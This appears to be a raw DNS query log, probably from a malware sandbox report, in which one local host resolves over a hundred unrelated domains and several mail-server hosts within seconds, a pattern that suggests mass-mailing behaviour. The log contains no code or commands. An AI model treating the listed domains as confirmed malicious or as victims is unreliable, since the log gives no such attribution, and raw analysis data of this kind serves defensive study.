                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.652506113 CEST192.168.2.68.8.8.80xbf0dStandard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.668567896 CEST192.168.2.68.8.8.80xa7e9Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.669902086 CEST192.168.2.68.8.8.80xc1faStandard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.740762949 CEST192.168.2.68.8.8.80x455dStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.756632090 CEST192.168.2.68.8.8.80xaf51Standard query (0)rkengg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.757060051 CEST192.168.2.68.8.8.80x43aaStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.780777931 CEST192.168.2.68.8.8.80xe2ffStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.793651104 CEST192.168.2.68.8.8.80x4097Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.833857059 CEST192.168.2.68.8.8.80x2e6bStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.844599009 CEST192.168.2.68.8.8.80x9972Standard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.879757881 CEST192.168.2.68.8.8.80xfd3fStandard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.978725910 CEST192.168.2.68.8.8.80x68f8Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.988734961 CEST192.168.2.68.8.8.80x8fe3Standard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:07.992202997 CEST192.168.2.68.8.8.80xe6bbStandard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.003102064 CEST192.168.2.68.8.8.80xd40dStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.004673958 CEST192.168.2.68.8.8.80xe0feStandard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.036528111 CEST192.168.2.68.8.8.80xc7beStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.053839922 CEST192.168.2.68.8.8.80x91bcStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.086983919 CEST192.168.2.68.8.8.80xdba0Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.087266922 CEST192.168.2.68.8.8.80x3b81Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.089629889 CEST192.168.2.68.8.8.80x3641Standard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.138880968 CEST192.168.2.68.8.8.80x7697Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.149558067 CEST192.168.2.68.8.8.80x4a2eStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.150252104 CEST192.168.2.6128.8.10.900xa1Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.161428928 CEST192.168.2.68.8.8.80x2cb2Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.168761015 CEST192.168.2.68.8.8.80x3e9aStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.233331919 CEST192.168.2.68.8.8.80x2364Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.273705006 CEST192.168.2.6192.58.128.300x8aStandard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.313235998 CEST192.168.2.6198.32.64.120xdcStandard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.321116924 CEST192.168.2.68.8.8.80xf1b4Standard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.325329065 CEST192.168.2.68.8.8.80x5bf6Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.346256971 CEST192.168.2.68.8.8.80xc5c4Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.350646973 CEST192.168.2.68.8.8.80x4c83Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.403556108 CEST192.168.2.68.8.8.80x146bStandard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.409159899 CEST192.168.2.68.8.8.80x1520Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.469327927 CEST192.168.2.68.8.8.80x7a11Standard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.488445997 CEST192.168.2.68.8.8.80x5e15Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.495796919 CEST192.168.2.68.8.8.80x6f20Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.514175892 CEST192.168.2.68.8.8.80x5506Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.578500986 CEST192.168.2.68.8.8.80x5ec9Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.596245050 CEST192.168.2.68.8.8.80xfe79Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.613559008 CEST192.168.2.68.8.8.80x395cStandard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.772728920 CEST192.168.2.68.8.8.80x455dStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.811359882 CEST192.168.2.68.8.8.80xbb1cStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.822874069 CEST192.168.2.68.8.8.80xacc2Standard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.828646898 CEST192.168.2.68.8.8.80xfc74Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.836261034 CEST192.168.2.68.8.8.80xec44Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.859463930 CEST192.168.2.68.8.8.80x31f2Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:08.867322922 CEST192.168.2.68.8.8.80x5baStandard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.084809065 CEST192.168.2.68.8.8.80xd287Standard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.087357044 CEST192.168.2.68.8.8.80x8442Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.091377974 CEST192.168.2.68.8.8.80x5b38Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.138617039 CEST192.168.2.68.8.8.80xe056Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.228127003 CEST192.168.2.68.8.8.80x2364Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.251811981 CEST192.168.2.68.8.8.80x8e0bStandard query (0)hbfuels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.273523092 CEST192.168.2.68.8.8.80x6351Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.276391983 CEST192.168.2.68.8.8.80xc9a6Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.276391983 CEST192.168.2.68.8.8.80x72dfStandard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.277188063 CEST192.168.2.68.8.8.80x5c9bStandard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.280966997 CEST192.168.2.68.8.8.80xb2d4Standard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.300084114 CEST192.168.2.68.8.8.80x717fStandard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.320919037 CEST192.168.2.68.8.8.80x93eaStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.381959915 CEST192.168.2.68.8.8.80x5174Standard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.407340050 CEST192.168.2.68.8.8.80x9530Standard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.444897890 CEST192.168.2.68.8.8.80x76acStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.600027084 CEST192.168.2.68.8.8.80xed56Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.603229046 CEST192.168.2.68.8.8.80x5ec9Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.685457945 CEST192.168.2.68.8.8.80x6c71Standard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.688713074 CEST192.168.2.68.8.8.80x940aStandard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.690136909 CEST192.168.2.68.8.8.80x6b54Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.698956966 CEST192.168.2.68.8.8.80xd80eStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.702979088 CEST192.168.2.68.8.8.80xc7d1Standard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.798211098 CEST192.168.2.68.8.8.80x1713Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.802830935 CEST192.168.2.68.8.8.80xd570Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.820854902 CEST192.168.2.68.8.8.80x5643Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.896526098 CEST192.168.2.68.8.8.80x7cc6Standard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.899739027 CEST192.168.2.68.8.8.80x52acStandard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.923310995 CEST192.168.2.68.8.8.80xac74Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.959549904 CEST192.168.2.68.8.8.80x752aStandard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:09.983599901 CEST192.168.2.68.8.8.80x96bcStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.044312954 CEST192.168.2.68.8.8.80x2a41Standard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.068826914 CEST192.168.2.68.8.8.80x89d4Standard query (0)apcotex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.192214012 CEST192.168.2.68.8.8.80xbc4aStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.225426912 CEST192.168.2.68.8.8.80x5eafStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.226438999 CEST192.168.2.68.8.8.80x7f4cStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.232259035 CEST192.168.2.68.8.8.80xd0c3Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.326260090 CEST192.168.2.68.8.8.80x717fStandard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.414921999 CEST192.168.2.68.8.8.80x67dfStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.447493076 CEST192.168.2.68.8.8.80x6f02Standard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.496810913 CEST192.168.2.68.8.8.80x8218Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.527090073 CEST192.168.2.68.8.8.80x6f20Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.555524111 CEST192.168.2.68.8.8.80x1c78Standard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.575540066 CEST192.168.2.68.8.8.80xa98dStandard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.581933022 CEST192.168.2.68.8.8.80x90baStandard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.601421118 CEST192.168.2.68.8.8.80x83aaStandard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.605196953 CEST192.168.2.68.8.8.80x147Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.614422083 CEST192.168.2.68.8.8.80x2c01Standard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.616303921 CEST192.168.2.68.8.8.80xed42Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.619251966 CEST192.168.2.68.8.8.80xe8b4Standard query (0)in1.smtp.messaginguser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.634313107 CEST192.168.2.68.8.8.80xed56Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.657419920 CEST192.168.2.68.8.8.80xac79Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.669291019 CEST192.168.2.68.8.8.80xf10dStandard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.711317062 CEST192.168.2.68.8.8.80x940aStandard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.797909975 CEST192.168.2.68.8.8.80x1c54Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:10.924330950 CEST192.168.2.68.8.8.80xac5Standard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.001482964 CEST192.168.2.68.8.8.80xbc7cStandard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.013504028 CEST192.168.2.68.8.8.80x1d49Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.061435938 CEST192.168.2.68.8.8.80x29ecStandard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.080414057 CEST192.168.2.68.8.8.80x1b6aStandard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.203350067 CEST192.168.2.68.8.8.80xa3aStandard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.388458014 CEST192.168.2.68.8.8.80x49f0Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.396648884 CEST192.168.2.68.8.8.80x3eecStandard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.425931931 CEST192.168.2.68.8.8.80x6e7Standard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.470814943 CEST192.168.2.68.8.8.80xe458Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.490215063 CEST192.168.2.68.8.8.80xb867Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.507709026 CEST192.168.2.68.8.8.80x713bStandard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.555165052 CEST192.168.2.68.8.8.80x3e22Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.681746960 CEST192.168.2.68.8.8.80xed56Standard query (0)mondopp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.732762098 CEST192.168.2.68.8.8.80xb10fStandard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.740300894 CEST192.168.2.68.8.8.80x5882Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.792371988 CEST192.168.2.68.8.8.80x1e46Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:11.792917967 CEST192.168.2.68.8.8.80xbbf4Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.217967987 CEST192.168.2.68.8.8.80x7108Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.316184998 CEST192.168.2.68.8.8.80xe260Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.353672981 CEST192.168.2.68.8.8.80x1e36Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.378931046 CEST192.168.2.68.8.8.80x346dStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.393526077 CEST192.168.2.68.8.8.80xb090Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.432097912 CEST192.168.2.68.8.8.80x69dcStandard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.443350077 CEST192.168.2.68.8.8.80x648Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.635669947 CEST192.168.2.68.8.8.80xfaafStandard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.658870935 CEST192.168.2.68.8.8.80x160Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.744896889 CEST192.168.2.68.8.8.80x5882Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.788626909 CEST192.168.2.68.8.8.80x1e46Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.815581083 CEST192.168.2.68.8.8.80xd2dStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.852802992 CEST192.168.2.68.8.8.80x9016Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.862883091 CEST192.168.2.68.8.8.80xf500Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.878247023 CEST192.168.2.68.8.8.80x34d9Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.951040030 CEST192.168.2.6192.228.79.2010x20Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.971247911 CEST192.168.2.68.8.8.80x2f3eStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:12.983155012 CEST192.168.2.6192.36.148.170x76Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.002589941 CEST192.168.2.68.8.8.80x1cc6Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.020296097 CEST192.168.2.6193.0.14.1290x49Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.030848980 CEST192.168.2.68.8.8.80xf552Standard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.034842014 CEST192.168.2.68.8.8.80x5fe6Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.382873058 CEST192.168.2.68.8.8.80x346dStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.405404091 CEST192.168.2.68.8.8.80x648Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.420557976 CEST192.168.2.6128.8.10.900xa1Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.571393967 CEST192.168.2.6198.32.64.120xdcStandard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.585179090 CEST192.168.2.68.8.8.80x876cStandard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:13.594758987 CEST192.168.2.68.8.8.80x247aStandard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:14.252366066 CEST192.168.2.68.8.8.80xbdd9Standard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:14.261970997 CEST192.168.2.68.8.8.80x160Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:14.362572908 CEST192.168.2.68.8.8.80x9b4fStandard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:14.610486984 CEST192.168.2.68.8.8.80x346dStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:14.698383093 CEST192.168.2.68.8.8.80x2b22Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:15.818336964 CEST192.168.2.68.8.8.80x698eStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:16.024925947 CEST192.168.2.68.8.8.80x79a7Standard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:16.031156063 CEST192.168.2.68.8.8.80x4c94Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:16.342011929 CEST192.168.2.68.8.8.80xc9c0Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:16.363440990 CEST192.168.2.68.8.8.80x54cStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.230499983 CEST192.168.2.68.8.8.80x346dStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.426835060 CEST192.168.2.68.8.8.80x1925Standard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.438347101 CEST192.168.2.68.8.8.80x4c49Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.448842049 CEST192.168.2.68.8.8.80x1941Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.460479021 CEST192.168.2.68.8.8.80xe0e2Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.481081963 CEST192.168.2.68.8.8.80x6addStandard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.489934921 CEST192.168.2.68.8.8.80x4b2bStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.530880928 CEST192.168.2.68.8.8.80x36f9Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.567711115 CEST192.168.2.68.8.8.80xc0bfStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:17.712423086 CEST192.168.2.68.8.8.80xc0acStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.195020914 CEST192.168.2.68.8.8.80x81aaStandard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.198438883 CEST192.168.2.68.8.8.80x2bf5Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.200825930 CEST192.168.2.68.8.8.80xf171Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:18.418534040 CEST192.168.2.68.8.8.80xcb52Standard query (0)esmoke.netA (IP address)IN (0x0001)false
